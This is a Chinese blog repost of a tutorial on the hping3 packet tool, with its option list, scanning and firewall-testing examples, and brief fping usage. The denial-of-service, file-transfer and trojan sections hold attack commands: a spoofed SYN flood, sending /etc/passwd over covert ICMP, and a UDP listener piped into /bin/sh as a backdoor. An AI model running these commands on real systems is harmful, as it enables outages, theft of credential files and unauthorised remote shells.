    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="网络安全">网络安全</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">网络安全</a>
            
            <a class="color2">拒绝服务攻击</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2019-10-20 02:01:38'>2019-10-19 01:57</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9C%AC%E6%96%87%E8%BD%AC%E8%BD%BD%E4%BA%8E"><span class="toc-text">本文转载于</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-text">hping3 使用详解</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#content_views"><span class="toc-text">hping</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#content_views"><span class="toc-text">Hping3 功能</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#content_views"><span class="toc-text">防火墙测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#content_views"><span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#content_views"><span class="toc-text">Idle扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#content_views"><span class="toc-text">拒绝服务攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#content_views"><span class="toc-text">文件传输</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#content_views"><span class="toc-text">木马功能</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#content_views"><span class="toc-text">fping 用法</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#content_views"><span class="toc-text">ping 用法</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="本文转载于"><a href="#本文转载于" class="headerlink" title="本文转载于"></a>本文转载于</h1><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/freeking101/article/details/72582964">https://blog.csdn.net/freeking101/article/details/72582964</a></p>
<div class="blog-content-box">
    <div class="article-header-box">
        <div class="article-header">
            <div class="article-title-box">
                <span class="article-type type-2 float-left">转载</span>                <h1 class="title-article">hping3 使用详解</h1>
            </div>
            <div class="article-info-box">
                <div class="article-bar-top" style="height: 24px;">
                                                                                                                                                                <span class="time">2017-05-20 19:29:06</span>
                    <a class="follow-nickName" href="https://me.csdn.net/freeking101" target="_blank" rel="noopener">擒贼先擒王</a>
                    <span class="read-count">阅读数 28236</span><span class="article_info_click" style="position: static;">更多</span>
                                                                    <div class="tags-box space">
                                <span class="label">分类专栏：</span>
                                                                                                            <a class="tag-link" target="_blank" rel="noopener" href="https://blog.csdn.net/freeking101/article/category/6554606">
                                            Kali                                        </a>
                                                                                                </div>
                                        </div>
                <div class="operating">
                                    </div>
            </div>
        </div>
    </div>
    <article class="baidu_pl">
                <div id="article_content" class="article_content clearfix">
                                    <link rel="stylesheet" href="https://csdnimg.cn/release/phoenix/template/css/ck_htmledit_views-3019150162.css">
                                        <link rel="stylesheet" href="https://csdnimg.cn/release/phoenix/template/css/ck_htmledit_views-3019150162.css">
                <div class="htmledit_views" id="content_views">
                                            <p>&nbsp;</p>

<p>hping3命令：<a target="_blank" href="http://man.linuxde.net/hping3" rel="nofollow noopener" data-token="6a666adc0401dc4b6cb4c06e65f31b9f">http://man.linuxde.net/hping3</a><br>
Testing firewall rules with Hping3 - examples：<a target="_blank" href="http://0daysecurity.com/articles/hping3_examples.html" rel="nofollow noopener" data-token="73cf9a3e53228a6c836f43e6f967217e">http://0daysecurity.com/articles/hping3_examples.html</a></p>

<p>攻防宝典：利用hping3和伪造IP地址执行DOS攻击：<a target="_blank" href="http://netsecurity.51cto.com/art/201508/489303.htm" rel="nofollow noopener" data-token="6ec1e2732cd3c8edd0fc7aa67ff321c7">http://netsecurity.51cto.com/art/201508/489303.htm</a><br>
DoS***方法（hping3）：<a target="_blank" href="http://19920624.blog.51cto.com/9632075/1584465" rel="nofollow noopener" data-token="7b66d864340a8afa7ad74ff62ed33d40">http://19920624.blog.51cto.com/9632075/1584465</a><br>
Nmap、Netcat、Hping3工具对比：<a target="_blank" href="http://www.2cto.com/article/201210/158961.html" rel="nofollow noopener" data-token="fafef22f5f9dcd48f713b57be753feec">http://www.2cto.com/article/201210/158961.html</a></p>

<p>&nbsp;</p>

<p>&nbsp;</p>

<h1><a name="t0"></a>hping</h1>

<p>&nbsp;</p>

<p><span style="color:#7c79e5;"><strong>hping </strong></span>是 面向命令行的用于生成和解析TCP/IP协议数据包汇编/分析的开源工具。作者是Salvatore Sanfilippo，界面灵感来自ping（8）unix命令，<span style="color:#7c79e5;"><strong>目前最新版是 hping3</strong></span>，它支持TCP，UDP，ICMP和RAW-IP协议，具有跟踪路由模式，能够在覆盖的信道之间发送文件以及许多其他功能，支持使用tcl脚本自动化地调用其API。<strong>hping是安全审计、防火墙测试等工作的标配工具</strong>。<span style="color:#7c79e5;"><strong>hping 优势在于能够定制数据包的各个部分，因此用户可以灵活对目标机进行细致地探测。</strong></span></p>

<p><img alt="" class="has" src="https://img-blog.csdn.net/20180211232455000"></p>

<p>虽然 hping 以前主要用作安全工具，但它可以在许多方面被不太关心安全性的人员用于测试网络和主机，您可以使用hping的一小部分内容：</p>

<pre class="has" name="code"><code class="language-diff"><span class="hljs-deletion">- 防火墙测试</span>
<span class="hljs-deletion">- 高级端口扫描</span>
<span class="hljs-deletion">- 网络测试，使用不同的协议，TOS，分片</span>
<span class="hljs-deletion">- 手动路径MTU发现</span>
<span class="hljs-deletion">- 在所有支持的协议下，高级traceroute</span>
<span class="hljs-deletion">- 远程操作系统指纹</span>
<span class="hljs-deletion">- 远程正常运行时间猜测</span>
<span class="hljs-deletion">- TCP/IP协议栈审计</span>
<span class="hljs-deletion">- hping也可以用于学习TCP/IP的学生</span></code></pre>

<p>工具来源：http://www.hping.org/<br><a target="_blank" href="http://www.hping.org/" rel="nofollow noopener" data-token="7f51d83cba2ad0ab7bddb7ce0b64b8c5">hping3主页</a>&nbsp;|&nbsp;<a target="_blank" href="http://git.kali.org/gitweb/?p=packages/hping3.git;a=summary" rel="nofollow noopener" data-token="285a7bdb46315ed5ee89cccf05530415">Kali hping3仓库</a></p>

<pre class="has" name="code"><code class="language-sql">用法: hping3 host [options]
  -h  <span class="hljs-comment">--help      显示帮助</span>
  -v  <span class="hljs-comment">--version   显示版本</span>
  -c  <span class="hljs-comment">--count     发送数据包的数目</span>
  -i  <span class="hljs-comment">--interval  发送数据包间隔的时间 (uX即X微秒, 例如： -i u1000)</span>
      <span class="hljs-comment">--fast      等同 -i u10000 (每秒10个包)</span>
      <span class="hljs-comment">--faster    等同 -i u1000 (每秒100个包)</span>
      <span class="hljs-comment">--flood      尽最快发送数据包，不显示回复。</span>
  -n  <span class="hljs-comment">--numeric   数字化输出，象征性输出主机地址。</span>
  -q  <span class="hljs-comment">--quiet     安静模式</span>
  -I  <span class="hljs-comment">--interface 网卡接口 (默认路由接口)</span>
  -V  <span class="hljs-comment">--verbose   详细模式</span>
  -D  <span class="hljs-comment">--debug     调试信息</span>
  -z  <span class="hljs-comment">--bind      绑定ctrl+z到ttl(默认为目的端口)</span>
  -Z  <span class="hljs-comment">--unbind    取消绑定ctrl+z键</span>
      <span class="hljs-comment">--beep      对于接收到的每个匹配数据包蜂鸣声提示</span>

模式选择
  default mode     TCP   // 默认模式是 TCP
  -0  <span class="hljs-comment">--rawip      RAWIP模式，原始IP模式。在此模式下HPING会发送带数据的IP头。即裸IP方式。使用RAWSOCKET方式。</span>
  -1  <span class="hljs-comment">--icmp       ICMP模式，此模式下HPING会发送IGMP应答报，你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。</span>
  -2  <span class="hljs-comment">--udp        UDP 模式，缺省下，HPING会发送UDP报文到主机的0端口，你可以用--baseport --destport --keep选项指定其模式。</span>
  -8  <span class="hljs-comment">--scan       SCAN mode. //扫描模式 指定扫描对应的端口。</span>
                   Example: hping <span class="hljs-comment">--scan 1-30,70-90 -S www.target.host    // 扫描</span>
  -9  <span class="hljs-comment">--listen     listen mode  // 监听模式</span>
  
IP 模式
  -a  <span class="hljs-comment">--spoof      spoof source address  //源地址欺骗。伪造IP攻击，防火墙就不会记录你的真实IP了，当然回应的包你也接收不到了。</span>
  <span class="hljs-comment">--rand-dest      random destionation address mode. see the man. // 随机目的地址模式。详细使用 man 命令</span>
  <span class="hljs-comment">--rand-source    random source address mode. see the man.       // 随机源地址模式。详细使用 man 命令</span>
  -t  <span class="hljs-comment">--ttl        ttl (默认 64)  //修改 ttl 值</span>
  -N  <span class="hljs-comment">--id         id (默认 随机)  // hping 中的 ID 值，缺省为随机值</span>
  -W  <span class="hljs-comment">--winid      使用win* id字节顺序  //使用winid模式，针对不同的操作系统。UNIX ,WINDIWS的id回应不同的，这选项可以让你的ID回应和WINDOWS一样。</span>
  -r  <span class="hljs-comment">--rel        相对id字段(估计主机流量)  //更改ID的，可以让ID曾递减输出，详见HPING-HOWTO。</span>
  -f  <span class="hljs-comment">--frag       拆分数据包更多的frag.  (may pass weak acl)   //分段，可以测试对方或者交换机碎片处理能力，缺省16字节。</span>
  -x  <span class="hljs-comment">--morefrag   设置更多的分段标志    // 大量碎片，泪滴攻击。</span>
  -y  <span class="hljs-comment">--dontfrag   设置不分段标志    // 发送不可恢复的IP碎片，这可以让你了解更多的MTU PATH DISCOVERY。</span>
  -g  <span class="hljs-comment">--fragoff    set the fragment offset    // 设置断偏移。</span>
  -m  <span class="hljs-comment">--mtu        设置虚拟最大传输单元, implies --frag if packet size &gt; mtu    // 设置虚拟MTU值，当大于mtu的时候分段。</span>
  -o  <span class="hljs-comment">--tos        type of service (default 0x00), try --tos help          // tos字段，缺省0x00，尽力而为？</span>
  -G  <span class="hljs-comment">--rroute     includes RECORD_ROUTE option and display the route buffer    // 记录IP路由，并显示路由缓冲。</span>
  <span class="hljs-comment">--lsrr           松散源路由并记录路由        // 松散源路由</span>
  <span class="hljs-comment">--ssrr           严格源路由并记录路由      // 严格源路由</span>
  -H  <span class="hljs-comment">--ipproto    设置IP协议字段，仅在RAW IP模式下使用   //在RAW IP模式里选择IP协议。设置ip协议域，仅在RAW ip模式使用。</span>

ICMP 模式
  -C  <span class="hljs-comment">--icmptype   icmp类型(默认echo请求)    // ICMP类型，缺省回显请求。</span>
  -K  <span class="hljs-comment">--icmpcode   icmp代号(默认0)     // ICMP代码。</span>
      <span class="hljs-comment">--force-icmp 发送所有icmp类型(默认仅发送支持的类型)    // 强制ICMP类型。</span>
      <span class="hljs-comment">--icmp-gw    设置ICMP重定向网关地址(默认0.0.0.0)    // ICMP重定向</span>
      <span class="hljs-comment">--icmp-ts    等同 --icmp --icmptype 13 (ICMP 时间戳)            // icmp时间戳</span>
      <span class="hljs-comment">--icmp-addr  等同 --icmp --icmptype 17 (ICMP 地址子网掩码)  // icmp子网地址</span>
      <span class="hljs-comment">--icmp-help  显示其他icmp选项帮助      // ICMP帮助</span>

UDP/TCP 模式
  -s  <span class="hljs-comment">--baseport   base source port             (default random)              // 缺省随机源端口</span>
  -p  <span class="hljs-comment">--destport   [+][+]&lt;port&gt; destination port(default 0) ctrl+z inc/dec    // 缺省随机源端口</span>
  -k  <span class="hljs-comment">--keep       keep still source port      // 保持源端口</span>
  -w  <span class="hljs-comment">--win        winsize (default 64)        // win的滑动窗口。windows发送字节(默认64)</span>
  -O  <span class="hljs-comment">--tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)    // 设置伪造tcp数据偏移量(取代tcp地址长度除4)</span>
  -Q  <span class="hljs-comment">--seqnum     shows only tcp sequence number        // 仅显示tcp序列号</span>
  -b  <span class="hljs-comment">--badcksum   (尝试)发送具有错误IP校验和数据包。许多系统将修复发送数据包的IP校验和。所以你会得到错误UDP/TCP校验和。</span>
  -M  <span class="hljs-comment">--setseq     设置TCP序列号 </span>
  -L  <span class="hljs-comment">--setack     设置TCP的ack   ------------------------------------- (不是 TCP 的 ACK 标志位)</span>
  -F  <span class="hljs-comment">--fin        set FIN flag</span>
  -S  <span class="hljs-comment">--syn        set SYN flag</span>
  -R  <span class="hljs-comment">--rst        set RST flag</span>
  -P  <span class="hljs-comment">--push       set PUSH flag</span>
  -A  <span class="hljs-comment">--ack        set ACK flag   ------------------------------------- （设置 TCP 的 ACK 标志 位）</span>
  -U  <span class="hljs-comment">--urg        set URG flag      // 一大堆IP抱头的设置。</span>
  -X  <span class="hljs-comment">--xmas       set X unused flag (0x40)</span>
  -Y  <span class="hljs-comment">--ymas       set Y unused flag (0x80)</span>
  <span class="hljs-comment">--tcpexitcode    使用last tcp-&gt; th_flags作为退出码</span>
  <span class="hljs-comment">--tcp-mss        启用具有给定值的TCP MSS选项</span>
  <span class="hljs-comment">--tcp-timestamp  启用TCP时间戳选项来猜测HZ/uptime</span>

Common //通用设置
  -d  <span class="hljs-comment">--data       data size    (default is 0)    // 发送数据包大小，缺省是0。</span>
  -E  <span class="hljs-comment">--file       文件数据</span>
  -e  <span class="hljs-comment">--sign       添加“签名”</span>
  -j  <span class="hljs-comment">--dump       转储为十六进制数据包</span>
  -J  <span class="hljs-comment">--print      转储为可打印字符</span>
  -B  <span class="hljs-comment">--safe       启用“安全”协议</span>
  -u  <span class="hljs-comment">--end        告诉你什么时候--file达到EOF并防止倒回</span>
  -T  <span class="hljs-comment">--traceroute traceroute模式(等同使用 --bind 且--ttl 1)</span>
  <span class="hljs-comment">--tr-stop        在traceroute模式下收到第一个不是ICMP时退出</span>
  <span class="hljs-comment">--tr-keep-ttl    保持源TTL固定，仅用于监视一跳</span>
  <span class="hljs-comment">--tr-no-rtt       不要在跟踪路由模式下计算/显示RTT信息 ARS包描述（新增功能，不稳定）</span>
ARS packet description (new, unstable)
  <span class="hljs-comment">--apd-send       发送APD描述数据包(参见docs / APD.txt)</span></code></pre>

<p>&nbsp;</p>

<p>&nbsp;</p>

<h1><a name="t1"></a>Hping3 功能</h1>

<p>&nbsp;</p>

<p><span style="color:#2d374b;">Hping3 主要有以下典型功能应用：</span></p>

<p>&nbsp;</p>

<h2><a name="t2"></a>防火墙测试</h2>

<p><span style="color:#2d374b;">使用Hping3指定各种数据包字段，依次对防火墙进行详细测试。请参考：http://0daysecurity.com/articles/hping3_examples.html&nbsp;</span></p>

<p><span style="color:#2d374b;">测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击（DoS attack）。例如，以LandAttack方式测试目标防火墙（Land Attack是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接）。</span></p>

<pre class="has" name="code"><code class="language-css"><span class="hljs-selector-tag">hping3</span> <span class="hljs-selector-tag">-S</span> <span class="hljs-selector-tag">-c</span> 1000000 <span class="hljs-selector-tag">-a</span> 10<span class="hljs-selector-class">.10</span><span class="hljs-selector-class">.10</span><span class="hljs-selector-class">.10</span> <span class="hljs-selector-tag">-p</span> 21 10<span class="hljs-selector-class">.10</span><span class="hljs-selector-class">.10</span><span class="hljs-selector-class">.10</span></code></pre>

<p>&nbsp;</p>

<h2><a name="t3"></a>端口扫描</h2>

<p>&nbsp;</p>

<p><span style="color:#2d374b;">Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。以下示例可用于探测目标机的80端口是否开放：</span></p>

<pre class="has" name="code"><code class="language-css"><span class="hljs-selector-tag">hping3</span> <span class="hljs-selector-tag">-I</span> <span class="hljs-selector-tag">eth0</span> <span class="hljs-selector-tag">-S</span> 192<span class="hljs-selector-class">.168</span><span class="hljs-selector-class">.10</span><span class="hljs-selector-class">.1</span> <span class="hljs-selector-tag">-p</span> 80</code></pre>

<p><span style="color:#2d374b;">其中-I eth0指定使用eth0端口，-S指定TCP包的标志位SYN，-p 80指定探测的目的端口。&nbsp;</span></p>

<p><span style="color:#2d374b;">hping3支持非常丰富的端口探测方式，nmap拥有的扫描方式hping3几乎都支持（除开connect方式，因为Hping3仅发送与接收包，不会维护连接，所以不支持connect方式探测）。而且Hping3能够对发送的探测进行更加精细的控制，方便用户微调探测结果。当然，Hping3的端口扫描性能及综合处理能力，无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。</span></p>

<p>&nbsp;</p>

<h2><a name="t4"></a>Idle扫描</h2>

<p><span style="color:#2d374b;">Idle扫描（Idle Scanning）是一种匿名扫描远程主机的方式，该方式也是有Hping3的作者Salvatore Sanfilippo发明的，目前Idle扫描在Nmap中也有实现。&nbsp;</span></p>

<p><span style="color:#2d374b;">该扫描原理是：寻找一台idle主机（该主机没有任何的网络流量，并且IPID是逐个增长的），攻击端主机先向idle主机发送探测包，从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包（此处假设为SYN包），此时如果远程主机的目的端口开放，那么会回复SYN/ACK，此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包，获取其IPID。那么对比两次的IPID值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。</span></p>

<p>&nbsp;</p>

<h2><a name="t5"></a>拒绝服务攻击</h2>

<p><span style="color:#2d374b;">使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。</span></p>

<pre class="has" name="code"><code class="language-css"><span class="hljs-selector-tag">hping3</span> <span class="hljs-selector-tag">-I</span> <span class="hljs-selector-tag">eth0</span> <span class="hljs-selector-tag">-a192</span><span class="hljs-selector-class">.168</span><span class="hljs-selector-class">.10</span><span class="hljs-selector-class">.99</span> <span class="hljs-selector-tag">-S</span> 192<span class="hljs-selector-class">.168</span><span class="hljs-selector-class">.10</span><span class="hljs-selector-class">.33</span> <span class="hljs-selector-tag">-p</span> 80 <span class="hljs-selector-tag">-i</span> <span class="hljs-selector-tag">u1000</span></code></pre>

<p><span style="color:#2d374b;">其他攻击如smurf、teardrop、land attack等也很容易构建出来。</span></p>

<p>&nbsp;</p>

<h2><a name="t6"></a>文件传输</h2>

<p><span style="color:#2d374b;">Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。在接收端开启服务：</span></p>

<pre class="has" name="code"><code class="language-css"><span class="hljs-selector-tag">hping3</span> 192<span class="hljs-selector-class">.168</span><span class="hljs-selector-class">.1</span><span class="hljs-selector-class">.159--listen</span> <span class="hljs-selector-tag">signature</span> <span class="hljs-selector-tag">--safe</span> <span class="hljs-selector-tag">--icmp</span></code></pre>

<p><span style="color:#2d374b;">监听ICMP包中的签名，根据签名解析出文件内容。&nbsp;</span></p>

<p><span style="color:#2d374b;">在发送端使用签名打包的ICMP包发送文件：</span></p>

<pre class="has" name="code"><code class="language-delphi">hping3 <span class="hljs-number">192.168</span>.<span class="hljs-number">1.108</span>--icmp ?d <span class="hljs-number">100</span> --sign signature --<span class="hljs-keyword">file</span> /etc/passwd</code></pre>

<p><span style="color:#2d374b;">将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节（-d 100），发送签名为signature(-sign signature)。</span></p>

<p>&nbsp;</p>

<h2><a name="t7"></a>木马功能</h2>

<p><span style="color:#2d374b;">如果Hping3能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开shell通信。与netcat的后门功能类似。</span></p>

<p><span style="color:#2d374b;">示例：本地打开53号UDP端口（DNS解析服务）监听来自192.168.10.66主机的包含签名为signature的数据包，并将收到的数据调用/bin/sh执行。&nbsp;</span></p>

<p><span style="color:#2d374b;">在木马启动端：</span></p>

<pre class="has" name="code"><code class="language-javascript">hping3 <span class="hljs-number">192.168</span><span class="hljs-number">.10</span><span class="hljs-number">.66</span>--listen signature --safe --udp -p <span class="hljs-number">53</span> | <span class="hljs-regexp">/bin/</span>sh</code></pre>

<p><span style="color:#2d374b;">在远程控制端：</span></p>

<pre class="has" name="code"><code class="language-delphi">echo ls &gt;test.cmd 
hping3 <span class="hljs-number">192.168</span>.<span class="hljs-number">10.44</span> -p53 -d <span class="hljs-number">100</span> --udp --sign siganature --<span class="hljs-keyword">file</span> ./test.cmd</code></pre>

<p><span style="color:#2d374b;">将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口，包数据长度为100字节。&nbsp;</span></p>

<p><span style="color:#2d374b;">当然这里只是简单的演示程序，真实的场景，控制端可以利益shell执行很多的高级复杂的操作。</span></p>

<p>&nbsp;</p>

<p>&nbsp;</p>

<p>&nbsp;</p>

<h1><a name="t8"></a>fping 用法</h1>

<p>&nbsp;</p>

<p><strong><a target="_blank" href="http://www.fping.org/" rel="nofollow noopener" data-token="bc6d466d524e8d697358f675eea88a67">fping 官网</a></strong></p>

<p>&nbsp; &nbsp; &nbsp; &nbsp; fping 是一个将&nbsp; ICMP echo 探测器发送到网络主机的程序，类似于 ping，可以看作是 ping 的增强版。但是 fping 在 ping多个主机时性能更好。</p>

<pre class="has" name="code"><code class="language-sql">Usage: fping [options] [targets...]
   -a         显示存活目标，即可ping通的目标
   -A         将目标以ip地址的形式显示
   -b n       ping 数据包的大小。（默认为56）
   -B f       <span class="hljs-keyword">set</span> exponential backoff factor <span class="hljs-keyword">to</span> f
   -c n       ping每个目标的次数 (默认为<span class="hljs-number">1</span>)
   -C n       同-c, 返回的结果为冗长格式
   -D         每个输出行打印时间戳
   -e         显示返回数据包所费时间
   -f <span class="hljs-keyword">file</span>    从文件获取目标列表( - 表示从标准输入)(不能与 -g 同时使用)
   -g         生成目标列表(不能与 -f 同时使用)
                (可指定目标的开始和结束IP， 或者提供ip的子网掩码)
                (例：fping -g <span class="hljs-number">192.168</span><span class="hljs-number">.1</span><span class="hljs-number">.0</span> <span class="hljs-number">192.168</span><span class="hljs-number">.1</span><span class="hljs-number">.255</span> 或 fping -g <span class="hljs-number">192.168</span><span class="hljs-number">.1</span><span class="hljs-number">.0</span>/<span class="hljs-number">24</span>)                
   -H n       设置ip的TTL值 (生存时间)
   -i n       ping包之间的间隔(单位：毫秒)(默认<span class="hljs-number">25</span>)
   -I <span class="hljs-keyword">if</span>      绑定到特定的接口
   -l         循环发送ping
   -m         ping目标主机的多个网口
   -M         设置不分段标记
   -n         将目标以主机名或域名显示(等价于 -d )
   -N         输出兼容netdata (-l -Q <span class="hljs-keyword">are</span> <span class="hljs-keyword">required</span>)
   -o         显示累计中断时间 (lost packets * packet <span class="hljs-built_in">interval</span>)
   -O n       在ICMP包中设置服务的类型(tos)标志
   -p n       对同一个目标的ping包间隔(毫秒)
                 (在循环和统计模式中，默认为<span class="hljs-number">1000</span>)
   -q         安静模式(不显示每个目标或每个ping的结果)
   -Q n       同-q, 但是每n秒显示信息概要
   -r n       当ping失败时，最大重试次数(默认为<span class="hljs-number">3</span>次)
   -R         random packet <span class="hljs-keyword">data</span> (<span class="hljs-keyword">to</span> foil <span class="hljs-keyword">link</span> <span class="hljs-keyword">data</span> compression)
   -s         打印最后的统计数据
   -S addr    设置源ip地址
   -t n       单个目标的超时时间(毫秒)(默认<span class="hljs-number">500</span>)
   -T n       请忽略(为兼容fping <span class="hljs-number">2.4</span>)
   -u         显示不可到达的目标
   -v         显示版本号
   targets    需要ping的目标列表(不能和 -f 同时使用)</code></pre>

<p>示例</p>

<pre class="has" name="code"><code class="language-css"><span class="hljs-selector-tag">fping</span> <span class="hljs-selector-tag">-A</span> <span class="hljs-selector-tag">-u</span> <span class="hljs-selector-tag">-c</span> 4 192<span class="hljs-selector-class">.168</span><span class="hljs-selector-class">.1</span><span class="hljs-selector-class">.1</span> 192<span class="hljs-selector-class">.168</span><span class="hljs-selector-class">.1</span><span class="hljs-selector-class">.74</span> 192<span class="hljs-selector-class">.168</span><span class="hljs-selector-class">.1</span><span class="hljs-selector-class">.20</span></code></pre>

<p>&nbsp;</p>

<p>&nbsp;</p>

<h1><a name="t9"></a>ping 用法</h1>

<p>&nbsp;</p>

<p><strong>ping 命令&nbsp;&nbsp;<a target="_blank" href="http://man.linuxde.net/ping" rel="nofollow noopener" data-token="25c8a7aefd5da2833359a7d55befa227">http://man.linuxde.net/ping</a></strong></p>

<p>&nbsp;</p>

<p>&nbsp;</p>

<p>&nbsp;</p>
                                    </div>
                    </div>
    </article>
    <div class="postTime"> 
        <div class="article-bar-bottom">
            <span class="time">
                文章最后发布于: 2017-05-20 19:29:06            </span>
        </div>
    </div>
</div>
      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达，可以邮件至 xingshuaikun@163.com。 </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 Yelog
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
